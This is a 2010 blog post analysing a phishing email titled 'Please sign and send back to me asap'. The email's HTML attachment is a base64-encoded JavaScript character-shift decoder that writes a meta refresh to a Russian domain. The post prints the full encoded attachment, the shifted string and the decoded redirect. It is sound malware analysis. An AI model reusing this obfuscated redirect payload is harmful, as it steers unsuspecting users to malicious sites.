Tuesday, September 21, 2010

Html virus inspired by a toy decoder ring

Here's a junior level virus attempt that's inspired by the cereal box decoder ring.
It's much easier to understand, and actually kinda fun to go through.

Subject: Please sign and send back to me asap

PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPg0KPCEtLQ0KdmFyIHM9Ij1uZnViIWl1dXEu
ZnJ2anc+I3NmZ3NmdGkjIWRwb3Vmb3U+IzE8dnNtPml1dXE7MDBxYnN1em9mYnMvc3YjITA/IjsN
Cm09IiI7IGZvciAoaT0wOyBpPHMubGVuZ3RoOyBpKyspIHsJaWYocy5jaGFyQ29kZUF0KGkpID09
IDI4KXsJICBtKz0gJyYnO30gZWxzZSBpZiAocy5jaGFyQ29kZUF0KGkpID09IDIzKSB7CSAgbSs9
ICchJzt9IGVsc2UgewkgIG0rPVN0cmluZy5mcm9tQ2hhckNvZGUocy5jaGFyQ29kZUF0KGkpLTEp
Owl9fWRvY3VtZW50LndyaXRlKG0pOy8vLS0+DQo8L3NjcmlwdD4NCg==

------=_Part_5860_20528071.5734153553633
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Forgot the Attachment - Here ya go!

------=_Part_5860_20528071.5734153553633
Content-Type: text/html; name="85104attach.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="85104attach.html"


After decoding we have:


[less than symbol] script type='text/javascript'>

var s = "=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m = "";
for (i = 0; i <>; i\<>


s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?";
m is empty
iterate over the length of s, i is the counter

This is the important part:
m += String.fromCharCode(s.charCodeAt(i) - 1);

pretty basic, shift the letters to the one before
n becomes m, f become e
Looking at
http://www.cdrummond.qc.ca/cegep/informat/Professeurs/Alain/files/ascii.htm
to see what's the order of the punctuation (! becomes space, # becomes ", etc)
The first character = becomes a less than symbol, but I removed it to keep things from executing.

nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1iuuq;00qbsuzofbs/sv#!0?
meta http-equiv="refresh" content="0;url=http://partynear.ru" />

This rest is just small stuff to get the script to work. Actually I think the & is put in the wrong place.

m=[28th position] insert an &
m=[23rd position] insert an !

document.write(m) sends the string to the browser. The "refresh" is what makes it all happen.

So what is at partynear.ru?
Not much according to the text only browser Lynx. It says "Unexpected network read error"
jsunpack shows that there appears to be a redirect sending you further into the site into a Themes/card.js area that is trying to run another javascript. It's not clear if this is smoke or malware or something else.

No comments: